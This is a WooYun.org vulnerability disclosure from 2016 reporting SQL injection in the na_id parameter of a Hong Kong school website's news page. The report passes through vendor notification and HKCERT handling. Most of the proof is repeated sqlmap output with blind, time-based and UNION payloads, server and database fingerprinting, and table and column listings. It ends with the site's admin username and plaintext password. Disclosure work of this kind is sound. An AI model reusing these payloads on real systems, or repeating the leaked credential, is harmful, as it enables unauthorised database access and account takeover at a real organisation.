香港圣保罗书院SQL注入（香港地區） | wooyun-2016-0175614| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0175614

漏洞标题：香港圣保罗书院SQL注入（香港地區）

漏洞作者：路人甲

提交时间：2016-02-16 10:11

修复时间：2016-03-01 14:43

公开时间：2016-03-01 14:43

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-02-16：细节已通知厂商并且等待厂商处理中
2016-02-17：厂商已经确认，细节仅向厂商公开
2016-02-27：细节向核心白帽子及相关领域专家公开
2016-03-01：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

1,2,1

详细说明：

http://**.**.**.**/news_detail.php?type=news&na_id=2295
na_id参数存在sql注入

漏洞证明：

sqlmap identified the following injection points with a total of 4030 HTTP(s) requests:
---
Parameter: na_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=news&na_id=2295 AND 6977=6977
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: type=news&na_id=(SELECT (CASE WHEN (5901=5901) THEN SLEEP(5) ELSE 5901*(SELECT 5901 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: type=news&na_id=-9555 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6b71,0x7565555a424852634673,0x717a787171)-- 
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY]-- 
---
web server operating system: Linux SuSE 11.1
web application technology: PHP 5.2.6, Apache 2.2.10
back-end DBMS: MySQL 5.0.12
current user:    'spc@localhost'
current database:    'spc'
current user is DBA:    False
available databases [2]:
[*] information_schema
[*] spc
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: na_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=news&na_id=2295 AND 6977=6977
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: type=news&na_id=(SELECT (CASE WHEN (5901=5901) THEN SLEEP(5) ELSE 5901*(SELECT 5901 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: type=news&na_id=-9555 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6b71,0x7565555a424852634673,0x717a787171)-- 
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY]-- 
---
web server operating system: Linux SuSE 11.1
web application technology: PHP 5.2.6, Apache 2.2.10
back-end DBMS: MySQL 5.0.12
Database: spc
[30 tables]
+---------------+
| user          |
| album         |
| archievement  |
| background    |
| banner        |
| banner2       |
| class         |
| class_subject |
| content       |
| main_banner   |
| menu          |
| na            |
| na_attachment |
| news          |
| photo         |
| principal_msg |
| product       |
| sa            |
| sa_album      |
| sa_committee  |
| sa_news       |
| sa_photo      |
| staff         |
| staff_title   |
| style         |
| sub_menu      |
| subject       |
| system_page   |
| title         |
| user_page     |
+---------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: na_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=news&na_id=2295 AND 6977=6977
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: type=news&na_id=(SELECT (CASE WHEN (5901=5901) THEN SLEEP(5) ELSE 5901*(SELECT 5901 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: type=news&na_id=-9555 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6b71,0x7565555a424852634673,0x717a787171)-- 
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY]-- 
---
web server operating system: Linux SuSE 11.1
web application technology: PHP 5.2.6, Apache 2.2.10
back-end DBMS: MySQL 5.0.12
Database: spc
Table: user
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(40) |
| status   | varchar(5)  |
| username | varchar(40) |
+----------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: na_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=news&na_id=2295 AND 6977=6977
    Vector: AND [INFERENCE]
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: type=news&na_id=(SELECT (CASE WHEN (5901=5901) THEN SLEEP(5) ELSE 5901*(SELECT 5901 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: type=news&na_id=-9555 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6b71,0x7565555a424852634673,0x717a787171)-- 
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY]-- 
---
web server operating system: Linux SuSE 11.1
web application technology: PHP 5.2.6, Apache 2.2.10
back-end DBMS: MySQL 5.0.12
Database: spc
Table: user
[1 entry]
+----------+----------+
| username | password |
+----------+----------+
| admin    | s3p2c@!! |
+----------+----------+

修复方案：

参数化查询
过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-02-17 16:05

厂商回复：

已將事件通知有關機構

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0175614

漏洞标题：香港圣保罗书院SQL注入（香港地區）

相关厂商：香港圣保罗书院

漏洞作者：路人甲

提交时间：2016-02-16 10:11

修复时间：2016-03-01 14:43

公开时间：2016-03-01 14:43

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0175614

漏洞标题：香港圣保罗书院SQL注入（香港地區）

相关厂商：香港圣保罗书院

漏洞作者： 路人甲

提交时间：2016-02-16 10:11

修复时间：2016-03-01 14:43

公开时间：2016-03-01 14:43

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态： 已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0175614"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云